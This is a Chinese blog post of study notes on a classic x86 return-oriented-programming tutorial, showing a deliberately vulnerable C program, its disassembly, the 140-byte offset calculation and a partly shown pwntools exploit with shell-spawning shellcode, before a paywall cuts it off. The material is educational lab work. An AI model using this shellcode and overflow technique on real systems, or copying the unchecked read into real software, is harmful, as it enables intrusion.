【逆向学习记录】学习《一步一步学ROP_x86》

最新推荐文章于 2024-05-09 09:34:17 发布
最新推荐文章于 2024-05-09 09:34:17 发布
阅读量1.4k 收藏 5
点赞数
分类专栏: 逆向学习记录 文章标签: ROP NX 栈溢出 x86 一步一步
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zhy025907/article/details/86151691
版权

1.概述

通过前面三篇文章,学习栈帧,GOT表,PLT表,接下来就可以进行漏洞利用,漏洞利用学习最好的方法就是利用经典,其中经典教学里面最经典的当属蒸米大神的一步一步教学系列
一步一步学ROP之linux_x86篇 – 蒸米
蒸米大神的文章,是实战类型,里面有不少细节的东西,对于我这种没有基础的人来讲,如果不理解是很容易忘记的,因此进行原理上的学习探索
环境:ubuntu 16.04
编译需要在原来的基础上添加-m32参数

2 一步一步的调试并解决疑问

2.1 源代码(蒸米)

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
void vulnerable_function() {
   
    char buf[128];
    read(STDIN_FILENO, buf, 256);
}
int main(int argc, char** argv) {
   
    vulnerable_function();
    write(STDOUT_FILENO, "Hello, World\n", 13);
}

2.2 汇编代码

    0x08048460 <+0>:     lea    ecx,[esp+0x4]
    0x08048464 <+4>:     and    esp,0xfffffff0
    0x08048467 <+7>:     push   DWORD PTR [ecx-0x4]
    0x0804846a <+10>:    push   ebp
    0x0804846b <+11>:    mov    ebp,esp
    0x0804846d <+13>:    push   ecx
    0x0804846e <+14>:    sub    esp,0x4
    0x08048471 <+17>:    call   0x804843b <vulnerable_function>
        0x0804843b <+0>:     push   ebp
        0x0804843c <+1>:     mov    ebp,esp
        0x0804843e <+3>:     sub    esp,0x88///这是88的关键
        0x08048444 <+9>:     sub    esp,0x4
        0x08048447 <+12>:    push   0x100
        0x0804844c <+17>:    lea    eax,[ebp-0x88]
        0x08048452 <+23>:    push   eax
        0x08048453 <+24>:    push   0x0
        0x08048455 <+26>:    call   0x8048300 <read@plt>
        0x0804845a <+31>:    add    esp,0x10
        0x0804845d <+34>:    nop
        0x0804845e <+35>:    leave
        0x0804845f <+36>:    ret
    0x08048476 <+22>:    sub    esp,0x4
    0x08048479 <+25>:    push   0xd
    0x0804847b <+27>:    push   0x8048520
    0x08048480 <+32>:    push   0x1
    0x08048482 <+34>:    call   0x8048320 <write@plt>
    0x08048487 <+39>:    add    esp,0x10
    0x0804848a <+42>:    mov    eax,0x0
    0x0804848f <+47>:    mov    ecx,DWORD PTR [ebp-0x4]
    0x08048492 <+50>:    leave
    0x08048493 <+51>:    lea    esp,[ecx-0x4]
    0x08048496 <+54>:    ret

2.3 level1 调试细节

2.3.1为什么是溢出点140个字节

通过画堆栈图,对比在read执行之前和执行之后的堆栈变化,进行计算
在这里插入图片描述
140个字节就是0xffffd52c - 0xffffd4a0 = 140
而Ret的地址为0xffffd52c----0xffffd530之间的四个字节
所以覆盖返回地址要 140 + ret

2.3.2 level1中的ret是什么,如何计算出来

直接copy 蒸米大神的漏洞利用exp

#!/usr/bin/env python
from pwn import *
p = process('./level1') 
ret = 0xbffff290

shellcode = "\x31\xc9\xf7\xe1\x51\x68\x2f\x2f\x73"
shellcode += "\x68\x68\x2f\x62\x69\x6e\x89\xe3\xb0"
shellcode += "\x0b\xcd\x80"

# p32(ret) == struct.pack("<I",ret) 
# 对ret进行编码,将地址转换成内存中的二进制存储形式
payload = shellcode + 'A' * (140 - len(shellcode)
最低0.47元/天 解锁文章
卦星
关注
  • 0
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
逆向学习记录学习一步一步ROP_x64》
卦星的专栏
01-12 1062
1.概述 通过前面几篇文章,基本上搞定了x86的漏洞原理,针对x64的还需要进一步学习,依然利用最经典的当属蒸米大神的一步一步系列 一步一步ROP之linux_x64篇 – 蒸米 环境:ubuntu 16.04 2.linux x86与x64的区别 这里引用一下上面文章中的语言: linux_64与linux_86的区别主要有两点: 1.首先是内存地址的范围由32位变成了64位。但是可以使用...
一步一步 ROP 之 linux_x64 篇-level5
weixin_43489686的博客
02-02 1513
这道题是来自蒸米一步一步ROP之linux_x64篇中的level5,主要考察的是中级ROP中的__libc_csu_init。 原理 __libc_csu_init这个函数是用来对libc进行初始化操作的,一般的程序都会调用libc函数,所以一般都会有这个函数。 .text:00000000004005C0 ; void _libc_csu_init(void) .text:00000000...
一步一步学习ROP x86Linux
zsj2102的专栏
11-16 1087
原文地址:http://drops.wooyun.org/tips/6597 0x00 序 ROP的全称为Return-oriented programming(返回导向编程),这是一种高级的内存攻击技术可以用来绕过现代操作系统的各种通用防御(比如内存不可执行和代码签名等)。虽然现在大家都在用64位的操作系统,但是想要扎实的ROP还是得从基础的x86系统开始,但看官请不要着急,在随
蒸米ROP学习笔记(一步一步 ROP 之 Linux_x86 篇)
niu_niu_的博客
04-15 2888
这里写自定义目录标题欢迎使用Markdown编辑器新的改变功能快捷键合理的创建标题,有助于目录的生成如何改变文本的样式插入链接与图片如何插入一段漂亮的代码片生成一个适合你的列表创建一个表格设定内容居中、居左、居右SmartyPants创建一个自定义列表如何创建一个注脚注释也是必不可少的KaTeX数公式新的甘特图功能,丰富你的文章UML 图表FLowchart流程图导出与导入导出导入 欢迎使用Markdown编辑器 你好! 这是你第一次使用 Markdown编辑器 所展示的欢迎页。如果你想学习如何使用Mar
探索黑客艺术:roputils - 逆向工程的利器
最新发布
gitblog_00040的博客
05-09 341
探索黑客艺术:roputils - 逆向工程的利器 项目地址:https://gitcode.com/inaz2/roputils 项目介绍 roputils 是一个针对 Return-oriented Programming(ROP)技巧的工具包。这个强大的Python库提供了从ELF解析到创建ROP链的一系列功能,适用于那些喜欢挑战逆向工程和安全研究的开发者和技术爱好者。其设计简洁,便于集成到...
关于蒸米一步一步ROP之linux_x86学习笔记
lingyuexueai的博客
08-12 1543
写在开头:level2没有源码,所以第二个“Ret2libc – Bypass DEP 通过ret2libc绕过DEP防护”做不动……另外socat还没会用==,按照步骤输入命令后一直没反应,也不知道怎么办,所以后面的远程攻击也没法进行……于是只做了第一个Control Flow Hijack 程序流劫持 原文地址:http://jaq.alibaba.com/community/art/sh...
利用开发,逆向工程和密码- alanvivona/pwnshop
01-27
PwnshopReverse Engineering, Exploitation & Crypto.Check out my , follow me on and !Support the project :Contents:Reverse engineering a simple crackme called “Just see”:Reverse engineering a level 1 ...
石像鬼:一种内存扫描规避技术
02-05
"石像鬼"是一种内存扫描规避技术,主要应用于安全领域,特别是针对逆向工程和漏洞利用防御。在软件安全中,内存扫描是攻击者寻找可利用的代码片段(如返回导向编程 gadgets)的一种常见手段。而"石像鬼"技术则是为了...
Python-ropa是一个基于Ropper的GUI简化了制作ROP
08-10
Python-ropa是一个面向开发者的工具,它利用了Ropper库的功能,为逆向工程和漏洞利用提供了更加用户友好的图形化界面。ROP(Return-Oriented Programming)是一种高级的利用技术,广泛应用于绕过现代操作系统中的...
My_SLAE:这些是我的 SLAE 考试的解决方案
07-01
5. **返回导向编程(Return-Oriented Programming, ROP)**:当传统的shellcode方法因数据执行保护(DEP)等安全措施而失效时,ROP成为一种有效的绕过手段。 6. **Windows和Linux下的shellcode**:比较不同操作系统...
颜色分类leetcode-barf-project:BARF:多平台开源二进制分析和逆向工程框架
07-06
颜色分类leetcode BARF : 二元分析和逆向工程框架 二进制代码的分析是计算机科和软件工程科的许多领域的关键活动,从软件安全和程序...:让您在二进制程序中搜索、分类和验证ROP 小工具。 BARFcfg :让您恢复二进制
一步一步ROP之Android ARM 32位篇
jltxgcy的专栏
02-19 2690
0x00    本文仅解释说明蒸米大神一步一步ROP之Android ARM 32位篇,读者应先阅读这篇文章,遇到问题再来看我这篇文章。   0x01    第一个问题:payload = 'A'*132 + p32(callsystemaddr),这个132是怎么来的?    要回答这个问题,我们需要把level6.c反汇编,level6.c代码如下: #include #include #i
一步一步ROP之linux_x86
HiTaQini
11-17 1293
ROP的全称为Return-oriented programming(返回导向编程),这是一种高级的内存攻击技术可以用来绕过现代操作系统的各种通用防御(比如内存不可执行和代码签名等)。虽然现在大家都在用64位的操作系统,但是想要扎实的ROP还是得从基础的x86系统开始。
linux内核rop姿势详解,一步一步ROP之linux_x86
weixin_36378771的博客
05-02 239
0x00本文仅解释说明蒸米大神一步一步ROP之linux_x86篇,读者应先阅读这篇文章,遇到问题再来看我这篇文章。阅读完这两篇文章后,我们会理解ROP(返回导向编程),DEP(堆栈不可执行),ASLR(内存地址随机化),Stack Protector(栈保护),Memory Leak。0x01第一个问题:为什么要构造成”A”*140+ret字符串,这个140是怎么来的呢?要回答这个问题,我们需...
一步一步ROP——ROP
weixin_42390670的博客
07-24 747
(接上文) 接下来我们打开ASLR保护。 sudo -s echo 2 > /proc/sys/kernel/randomize_va_space` 现在我们再回头测试一下level2的exp,发现已经不好用了。 #!bash $python exp2.py [+] Started program './level2' [*] Switching to interactive mode ...
什么是ROP系统攻击
WH的博客
12-17 3164
文章目录ROP系统攻击初步了解寄存器内存管理常见汇编指令再究ROP攻击 ROP系统攻击初步了解 ROP全称为Return-oriented Programming(面向返回的编程)是一种新型的基于代码复用技术的攻击,攻击者从已有的库或可执行文件中提取指令片段,构成恶意代码。 ROP的核心思想 (1)攻击者扫描已有的动态链接库和可执行文件,提取出可以利用的指令片段(gadget),这些指令片段均以ret指令结尾,即用ret指令实现指令片段执行流的衔接。 (2)操作系统通过栈来进行函数的调用和返回。函数
一步一步ROP之gadgets和2free篇
omnispace的博客
03-06 2455
原文: http://drops.wooyun.org/binary/10638 0x00序 ROP的全称为Return-oriented programming(返回导向编程),这是一种高级的内存攻击技术,可以用来绕过现代操作系统的各种通用防御(比如内存不可执行和代码签名等)。上次我们主要讨论了linux_x64的ROP攻击。 一步一步ROP之linux_x86篇http://d
一步一步ROP之linux_x64篇
weixin_34204057的博客
11-07 277
一步一步ROP之linux_x64篇 一、序 **ROP的全称为Return-oriented programming(返回导向编程),这是一种高级的内存攻击技术可以用来绕过现代操作系统的各种通用防御(比如内存不可执行和代码签名等)。上次我们主要讨论了linux_x86ROP攻击:《一步一步ROP之linux_x86篇》,在这次的教程中我们会带来上...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值